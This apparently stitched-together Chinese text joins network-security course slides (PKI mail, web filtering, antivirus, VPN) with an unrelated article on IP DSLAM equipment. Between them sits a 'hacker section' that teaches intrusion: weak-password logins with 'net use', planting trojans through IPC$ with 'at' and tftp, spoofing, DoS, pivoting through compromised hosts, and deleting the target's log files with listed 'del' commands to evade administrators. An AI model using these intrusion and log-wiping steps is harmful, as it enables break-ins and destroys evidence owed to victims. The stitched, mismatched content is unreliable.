·將PKI體系應用到郵件系統中

·郵件的加密和解密以實現數據的保密。
·郵件的數字簽名（鑒別）實現發件人認證和不可抵賴。
·完整性校驗功能防止信息傳輸過程中被篡改可*的安全性。
·採用公開密鑰和對稱密鑰相結合的密鑰體系。
·支持128bit對稱密鑰演算法和1024bit公開密鑰演算法。

辦公自動化系統的安全問題
· 如何保證發送的敏感信息不被泄漏
· 如何保證發送的信息不被篡改
· 如何確認發件人的真實身份
· 如何防止發件人的抵賴行為

安全辦公自動化系統的解決方法
·將PKI體系應用到辦公自動化系統中
·工作流信息的加密和解密以實現數據保密
·工作流信息的數字簽名（鑒別）實現發件人認證和不可抵賴。
·完整性校驗功能防止信息傳輸過程中被篡改可*的安全性。
·採用公開密鑰和對稱密鑰相結合的密鑰體系
·支持128bit對稱密鑰演算法和1024bit公開密鑰演算法。

Internet訪問及控制系統
·Internet使用存在的問題

·Internet使用的解決方法
·內容緩存系統
·Internet站點過濾系統

Internet訪問存在的問題
·Internet接入帶寬不足，訪問比較慢。
·大量的用戶訪問相同的內容，造成帶寬的進一步擁擠。
·在上班時間里大量的Internet訪問是與業務無關的。
·有人使用公司的Internet系統訪問色情網站。
·有人使用公司的Internet系統訪問反動站點。
·管理人員無法知道Internet系統的使用情況。

Internet訪問的解決方法
· 對於問題一，採用內容緩存系統。
· 對於問題二，採用Internet 站點過濾系統。

內容緩存系統
·1、Client 發起http連接請求
·2、Proxy 收到請求後將檢查內部緩存內是否有所需內容，若有，則返還給Client。
·3、若無，則Proxy根據請求向目的伺服器發起請求。
·4、Web伺服器將內容返回到Proxy伺服器。
·5、Proxy伺服器將得到的內容發回給Client，並在自己的緩存中保存一份。

Internet站點過濾系統 (一)
·1、Client 發起http連接請求
·2、連接到達防火牆時防火牆將URL送到WebSense Server 檢查。
·3、WebSense 將審查結果返回到防火牆。
·4、防火牆根據其策略決定是否讓該連接通過。
Internet站點過濾系統 (二)
·1、Client 發起http連接請求
·2、Proxy 受到請求後將URL送到WebSense Server檢查。
·3、Proxy根據返回的結果決定是否接收該連接請求。

病毒防範系統
· 互連網時代對防病毒系統的要求
· 計算機病毒解決方法
· 典型病毒防範系統部署

互聯網時代對防病毒系統的要求
· 由於計算機的聯網使用，使得病毒傳播的途徑大為增多：網路文件共享、電子郵件、Int
ernet文件下載，傳播速度也大為加快。
· 新病毒的出現速度加快，用戶的防病毒軟體的病毒特徵碼沒能及時更新。
· 目前已出現了惡意的Java、ActiveX，當使用者瀏覽到包含這些代碼的網頁時，會造成安
全問題。

· 一些來歷不明的電子郵件程序或下載的程序中帶有特洛依木馬，可能會造成受害者的主
機被他人控制。

計算機病毒解決方法
· 從系統的觀點考慮病毒的防範，在所有病毒傳輸的途徑上均配置防病毒軟體，如客戶端
（Win98、 · Win2000)、文件伺服器（NT、Netware）、郵件伺服器（Exchange、Lotus
Notes）、Internet接入系統（Proxy、Firewall)等。
· 整個病毒防範系統採用集中管理的方式，病毒特徵碼統一更新，安全策略集中設定，從
而使得整個網路系統的病毒特徵碼得到快速更新。
· 通過在客戶端的瀏覽器和Proxy、Firewall中嵌入病毒檢查軟體，來防範下在程序中帶有
的病毒和可能的惡意Java、ActiveX等可執行代碼的攻擊。

VPN（虛擬私有網）
· 數據加密分類
· 物理線路加密
· 數據鏈路加密
· 網路層加密—IPSec
· 傳輸層加密—SSL

數據加密類型
·物理層->物理層 物理線路加密
·數據鏈路層->數據鏈路層 (路由器訪問)

·在數據鏈路層(如PPP）進行加密 L2TP、PPTP、L2F
·網路層->網路層(路由器 防火牆 主機)
·在網路層 （如IP）進行加密 IPSec
·傳輸層->傳輸層 (對TCP進行加密 SSL)
·應用層->應用層(在應用層 (如TCP）進行加密 S/MIME、SET、SSH)

物理線路加密
· DDN 加密機
· 幀中繼加密機
· 非同步撥號Modem
· ISDN線路密碼機
· ATM加密機

注:傳輸層加密
·Secure Sockets Layer (SSL) 是一個端到端的Internet 安全協議，通過採用數字證書，
它提供了數據加密、身份認證的功能。SSL建立在傳輸層，它為客戶機和伺服器在應用級建
立起一個端到斷的安全會話。
·SSL代理—128位的高強度加密模塊

結束語·恭喜你:
·學完這些並且可以熟練應用,已經是一個真正的網路安全專家了!
·希望此時的你旁邊有個溫柔稍有點調皮的女朋友,為這孤獨而寂寞的網路添加一點跳動的

色彩!

黑客編：
必須要掌握的幾個命令
·Net
·netsh
·Ftp
·hostname
·Telenet(nc)
·tracert
·At
·Tftp
·Netstat
·Regedit
·Ping

必須要掌握的幾個協議
·http
·dns
·ftp
·Pop
·Smtp

·Icmp
·Udp
·tcp

開始
·掌握了黑客攻擊的方式和手段後,那麼學習黑客就簡單多了!
·因為你掌握了這些,剩餘的就是使用工具入侵
·熟悉掌握一套自己用的黑客工具

高級
·自己編寫專用的黑客工具
·自己發現系統漏洞

黑客入侵手段
·收集信息:
· 收集要入侵的目標信息
· IP,域名,埠,漏洞,位置

弱口令
·在nt\2000\xp\2003中弱口令可以用
·Net use \ip 「password」 /user:user
·如果目標機開3389服務,可以直接連接

·在sql的sa弱口令,可以用sql連接器直接 ·登陸

後門木馬
·如果有ipc$共享,可以過去木馬後門
·用at啟動
·AT \ip time /INTERACTIVE
·如果可以得到shell,也可以用tftp
·Tftp.exe –i ip get *.* *.*
·然後直接安裝 ·如果有3389,可以自己建一個iis,下載 直接運行

密碼破解
·遠程破解mysql,mssql,ftp,mail,共享密碼
·本地破解管理員(administrator)密碼

緩沖溢出
·可以用緩沖溢出攻擊,
·比如流行的webdev,rdcom模塊漏洞
·可以直接得到system管理許可權
·緩沖溢出後的一般現象是:
·Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>

Web服務漏洞
·例如:
·Unicode漏洞遍歷磁碟和執行程序
·二次編碼漏洞遍歷磁碟和執行程序
·.HTR漏洞查看源代碼

嗅探監聽
·例如:
·針對web監聽
·針對mail監聽
·工具如:sinffer , iris

欺騙攻擊
·例如:
·運用arp欺騙攻擊

偽裝欺騙
·常見的如:mail病毒
·把一個文件改名字甚至圖標,欺騙對方執行

社會工程學

·例如:
·QQ聊天誘惑
·EMAIL信息
·電話
·誘惑

拒絕服務
·例如:
·Dos攻擊
·Ddos攻擊

利用跳板
·利用自己的肉雞作為跳板攻擊別的機器
·My PC------>跳板(肉雞)--->目標

路由器漏洞
·如:
·原始密碼
·程序漏洞

防火牆
·利用欺騙攻擊防火牆,導致防火牆功能失效

·利用防火牆的模塊漏洞

unix/linux
·NetWare Linux unix solais Solaris hp-unix Aix 等
·這些目前先不講解

精通黑客工具
·必須有一套自己可以完全掌握的黑客工具
·如埠掃描 Nscan,bluescanport
·監聽工具:sinffer iris
·telnet工具:nc
·掃描工具:sss,nmap, LANguard
·後門工具:radmin,winshell
·密碼破解:lc4
·遠程管理:pcanywhere
·會使用各種經典的黑客工具

清除日誌
·在你入侵機器以後,離開的時候,要完全清除
·自己在那台機器上留下的痕跡
·例如清除
·Del C:\WINNT\system32\LogFiles\*.*

·Del C:\WINNT\system32\*.log
·Del C:\WINNT\system32\*.txt
·Del C:\WINNT\*.log
·Del c:\winnt\*.txt

如果你不清除日誌
·當目標機器的管理員發現你的證據
·完全可以讓你在大牆內渡過一段日子

黑客
·當你完全掌握這些後
·你就成為了一名小黑客

高級
·編寫自己的黑客工具
·發現系統漏洞

高級黑客
·目前你足以成為一個高級黑客了

真正的黑客
·精通各種網路協議

·精通操作系統
·精通編程技術
·精通安全防護
·不搞破壞
·挑戰技術難題

結束

⑤ 什麼是DSLAM設備

數字用戶線接入復用器（DSLAM）是xDSL的局端設備。隨著xDSL業務在固網市場的迅速普及，DSLAM技術也在發展，本文旨在對目前的一個熱點問題-IP DSLAM技術進行探討。

一、IP DSLAM產生的背景

傳統的DSLAM是一個完全的ATM架構的設備，也就是常說的基於ATM方式的DSLAM。它提供ATM介面（如155Mbit/s的ATM介面或N*2Mbit/s IMA ATM介面），上聯城域核心網，具有ATM VP/VC交叉連接，提供ATM流量匯聚、通過ATM的QoS技術來實現業務的服務質量及流量控制。目前網上實際安裝的DSLAM絕大多數都是這種方式的DSLAM。但是，由於在很多地區運營商已不再對其已有的城域ATM核心網進行擴容並轉而建設IP寬頻城域核心網，因此隨著城域ATM可用資源的日益減少，基於ATM方式的DSLAM已越來越難以適應實際組網的需要，而IP DSLAM將成為DSLAM未來發展的方向。

二、IP DSLAM的定義和功能

目前對於IP DSLAM的定義眾說紛紜，廣義的說法是將所有具有IP上聯埠的DSLAM都統稱為IP DSLAM。當然，更准確地說，IP DSLAM應該稱為Packet DSLAM，這是因為目前許多提供IP上聯介面的DSLAM只完成Ethernet層功能，並不對IP層協議進行處理，而那些能夠完成IP層處理，實現IP數據包路由的DSLAM才是真正意義上的IP DSLAM。

IP DSLAM從實現的功能角度劃分，可分為兩種形態，一種形態的DSLAM僅對Ethernet層（Layer2）進行處理，另一種形態的DSLAM不僅對Ethernet層進行處理，而且還對IP層進行處理並將寬頻接入伺服器BAS功能集成進來。

第一種形態的DSLAM具體完成以下功能。

1．支持二層Ethernet數據包的本地轉發使能/禁止控制；
2．支持基於埠的二層Ethernet數據包的過濾，有些設備還支持基於MAC地址（包括源MAC地址、目的MAC地址）的數據包過濾
3．支持不同ADSL埠的二層隔離；
4．支持IEEE 802.1Q協議，支持按照埠劃分VLAN，有些設備還支持按照MAC地址劃分VLAN；
5．廣播風暴抑制，可對廣播包、多播包進行流量抑制；
6．埠配置、埠狀態查詢和設置，基於埠的數據流收發統計；
7．當DSLAM提供多個FE/GE上聯口時，支持IEEE802.3ad鏈路聚集功能；
8．支持流量控制功能；
9．支持IGMP Snooping組播功能。

另外，還有一些設備還實現了IEEE802.1p優先順序控制、IEEE802.1d 生成樹功能以及802.1x埠接入控制功能。

第二種形態的DSLAM除支持Ethernet層功能之外，還具備以下功能。

1．IP數據包的轉發，支持靜態路由、RIPv2、OSPF協議；
2．支持IP組播，並支持IP組播IGMPv2、DVMRP、PIM協議；
3．支持用戶接入速率控制；
4．支持IP優先順序控制及排隊策略（WRR、DRR、WFQ、WF2Q等），有些設備還支持擁塞控制功能；
5．支持動態和靜態分配用戶IP地址；
6．寬頻接入伺服器功能。目前，主流的寬頻接入伺服器都支持PPPoE/PPPoA用戶接入控制，也有一些設備同時支持PPPoE/PPPoA和802.1x認證。由於集成了BAS功能，相應的還具有以下功能。
7．支持ADSL專線用戶IP地址防盜用；
8．支持ADSL用戶接入帳號和埠捆綁；
9．支持限制ADSL同一PVC下獲取IP地址數目；
10．支持本地和Radius兩種用戶認證方式；
11．必須支持自動檢測用戶的異常下線，並釋放相應的網路資源，停止記費。
12．提供認證成功後的用戶按時長和流量的計費信息。

三、IP DSLAM的分類

IP DSLAM從系統設計的角度又可分為兩種類型，一種是採用ATM信元匯流排/矩陣交換內核，並具有IP上行介面的IP DSLAM，另一種是在xDSL線路介面卡完成ATM和IP的轉換，同時採用大容量的IP交換內核的IP DSLAM。

對於第一種方式的IP DSLAM，存在以下一些問題。

1．DSLAM在進行ATM與IP轉換時需要消耗大量資源，而集中在上行介面板統一處理無疑使上行介面成為了瓶頸，在數據流量較大時很容易導致設備上行埠擁塞；
2．由於沿用了ATM內核，其級聯是通過ATM內部匯流排採用專用線纜直接級連。在實現級連時由於數據流量更大，上行瓶頸現象更為嚴重。這使得網路擴容非常困難；
3．ATM的機制本身不支持點到多點的傳輸模式，如果要實現只能通過CPU在每條PVC逐個拷貝，開銷大且效率低下。所以採用ATM內核的 DSLAM很難支持組播業務；

為了解決上述問題，國內一些廠家陸續推出了採用IP內核的IP DSLAM.由於採用了全新的技術架構，具有IP內核的DSLAM具有以下一些特點。

1．全分布式ATM與IP轉換，大大提高設備整體處理能力，分散設備故障風險，提高設備的性能和穩定性；
2．全分布式ATM轉換，可將ATM PVC直接與VLAN ID相對應，滿足專線用戶安全性要求，並支持基於VLAN的VPN應用；
3．全分布式ATM轉換，可充分利用成熟廉價的三層交換架構，提供非常高的背板交換能力，支持ADSL線速轉發，消除設備交換瓶頸；
4．IP內核設計，可利用大容量交換背板提供高帶寬埠支持能力，可支持多個GE/FE介面，消除設備上行帶寬瓶頸；
5．由於採用IP內核設計，不必受ATM匯流排擴容的約束，利用高密度的高帶寬埠，可實現靈活的級聯擴容，並支持比傳統方式大7倍以上的單點用戶容量；
6．當用戶遷移時無需對ATM PVC作全程配置，用戶端與網路無需作任何改動，即可為用戶繼續提供服務，大大縮短了業務變更時間，減少業務提供的工作量；
7．利用IP內核提供的組播支持能力，可在DSLAM和上行設備上開通組播業務和視頻點播業務提升了網路的業務提供能力，並為更多的增值應用奠定了優越的網路基礎；
8．支持全分布式PPPoE認證，無需集中式BRAS設備即可提供用戶的認證、計費和管理能力並與原有運營模式完全兼容，避免集中式BRAS引入的性能、穩定性和業務支持能力瓶頸，提高了整網的穩定性和帶寬提供能力；
9．採用全分布式認證，繼承了PPPoE認證對用戶管理的能力，而且由於用戶認證時可將每用戶的物理位置信息（該DSLAM的IP地址，該用戶在DSLAM上的物理埠號）攜帶給RADIUS，實現IP地址反查非常容易；
10．採用全分布式PPPoE認證，可利用帳號+埠的綁定能力，提供運營商要求的網路安全性和防止資費流失；
11．採用PPPoE認證，可根據用戶開戶時的要求在RADIUS上生成數據，動態分配帶寬，無需每設備配置，也無須復雜的PVC配置，節省運營成本，並提供帶寬包月，時長+帶寬+優惠政策等的復雜計費策略，豐富了ADSL的產品線；

四、結論

應該說，在現有城域核心網從ATM向IP轉變的趨勢下，ATM DSLAM將不可避免地被IP DSLAM所取代。而對於採用IP內核架構的IP DSLAM，由於其鮮明的特點並具有天然的BAS集成能力，在未來的DSLAM市場中將占據重要的一席之地。

當然，採用全分布式的BAS組網也會給網路的組織、運營維護也會帶來一定的問題，因此，筆者的觀點是，對於一個電信級可運營、可管理的城域網，在整網存在大量寬頻用戶的情況下，BAS的網路組織將是一個集中式和分布式的綜合。對於寬頻用戶密集且數量較大的地區，採用具有BAS功能的IP DSLAM將成為一種趨勢。